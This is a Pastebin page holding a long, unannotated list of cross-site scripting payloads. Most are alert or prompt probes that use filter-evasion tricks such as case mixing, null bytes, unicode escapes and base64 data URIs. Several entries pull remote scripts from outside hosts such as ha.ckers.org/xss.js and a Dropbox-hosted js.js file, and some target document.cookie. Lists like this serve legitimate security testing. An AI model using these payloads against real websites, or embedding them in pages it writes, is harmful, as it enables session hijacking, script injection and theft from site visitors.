Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script>alert(123);</script>
- <ScRipT>alert("XSS");</ScRipT>
- <script>alert(123)</script>
- <script>alert("hellox worldss");</script>
- <script>alert(“XSS”)</script>
- <script>alert(“XSS”);</script>
- <script>alert(‘XSS’)</script>
- “><script>alert(“XSS”)</script>
- <script>alert(/XSS”)</script>
- <script>alert(/XSS/)</script>
- </script><script>alert(1)</script>
- ‘; alert(1);
- ‘)alert(1);//
- <ScRiPt>alert(1)</sCriPt>
- <IMG SRC=jAVasCrIPt:alert(‘XSS’)>
- <IMG SRC=”javascript:alert(‘XSS’);”>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=javascript:alert(‘XSS’)>
- <img src=xss onerror=alert(1)>
- <iframe %00 src="	javascript:prompt(1)	"%00>
- <svg><style>{font-family:'<iframe/onload=confirm(1)>'
- <input/onmouseover="javaSCRIPT:confirm(1)"
- <sVg><scRipt %00>alert(1) {Opera}
- <img/src=`%00` onerror=this.onerror=confirm(1)
- <form><isindex formaction="javascript:confirm(1)"
- <img src=`%00`
 onerror=alert(1)

- <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
- <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
- <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
- <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
- "><h1/onmouseover='\u0061lert(1)'>%00
- <iframe/src="data:text/html,<svg onload=alert(1)>">
- <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
- <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
- <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
- <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
- <iframe src=javascript:alert(document.location)>
- <form><a href="javascript:\u0061lert(1)">X
- </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
- <img/	  src=`~` onerror=prompt(1)>
- <form><iframe 	  src="javascript:alert(1)" 	;>
- <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
- http://www.google<script .com>alert(document.location)</script
- <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
- <img/src=@  onerror = prompt('1')
- <style/onload=prompt('XSS')
- <script ^__^>alert(String.fromCharCode(49))</script ^__^
- </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
- �</form><input type="date" onfocus="alert(1)">
- <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
- <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
- <iframe srcdoc='<body onload=prompt(1)>'>
- <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
- <script ~~~>alert(0%0)</script ~~~>
- <style/onload=<!--	> alert (1)>
- <///style///><span %2F onmousemove='alert(1)'>SPAN
- <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
- "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
- <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
- <marquee onstart='javascript:alert(1)'>^__^
- <div/style="width:expression(confirm(1))">X</div> {IE7}
- <iframe/%00/ src=javaSCRIPT:alert(1)
- //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
- /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
- //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
- </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
- <a/href="javascript: javascript:prompt(1)"><input type="X">
- </plaintext\></|\><plaintext/onmouseover=prompt(1)
- </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
- <a href="javascript:\u0061le%72t(1)"><button>
- <div onmouseover='alert(1)'>DIV</div>
- <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
- <a href="jAvAsCrIpT:alert(1)">X</a>
- <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- <var onmouseover="prompt(1)">On Mouse Over</var>
- <a href=javascript:alert(document.cookie)>Click Here</a>
- <img src="/" =_=" title="onerror='prompt(1)'">
- <%<!--'%><script>alert(1);</script -->
- <script src="data:text/javascript,alert(1)"></script>
- <iframe/src \/\/onload = prompt(1)
- <iframe/onreadystatechange=alert(1)
- <svg/onload=alert(1)
- <input value=<><iframe/src=javascript:confirm(1)
- <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
- http://www.<script>alert(1)</script .com
- <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
- <svg><script ?>alert(1)
- <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
- <img src=`xx:xx`onerror=alert(1)>
- <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
- <math><a xlink:href="//jsfiddle.net/t846h/">click
- <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
- <svg contentScriptType=text/vbs><script>MsgBox+1
- <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
- <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
- <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
- <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
- <object data=javascript:\u0061le%72t(1)>
- <script>+-+-1-+-+alert(1)</script>
- <body/onload=<!-->
alert(1)>
- <script itworksinallbrowsers>/*<script* */alert(1)</script
- <img src ?itworksonchrome?\/onerror = alert(1)
- <svg><script>//
confirm(1);</script </svg>
- <svg><script onlypossibleinopera:-)> alert(1)
- <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- <script x> alert(1) </script 1=2
- <div/onmouseover='alert(1)'> style="x:">
- <--`<img/src=` onerror=alert(1)> --!>
- <script/src=data:text/javascript,alert(1)></script>
- <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
- "><img src=x onerror=window.open('https://www.google.com/');>
- <form><button formaction=javascript:alert(1)>CLICKME
- <math><a xlink:href="//jsfiddle.net/t846h/">click
- <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
- <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
- <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=”jav ascript:alert(‘XSS’);”>
- <IMG SRC=”jav	ascript:alert(‘XSS’);”>
- <<SCRIPT>alert(“XSS”);//<</SCRIPT>
- %253cscript%253ealert(1)%253c/script%253e
- “><s”%2b”cript>alert(document.cookie)</script>
- foo<script>alert(1)</script>
- <scr<script>ipt>alert(1)</scr</script>ipt>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- <BODY ONLOAD=alert(‘XSS’)>
- <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
- <IMG SRC=”javascript:alert(‘XSS’)”
- <iframe src=http://ha.ckers.org/scriptlet.html <
- javascript:alert("hellox worldss")
- <img src="javascript:alert('XSS');">
- <img src=javascript:alert("XSS")>
- <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
- <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
- <script>alert("XSS");</script>&search=1
- 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'>
Add Comment
Please, Sign In to add comment
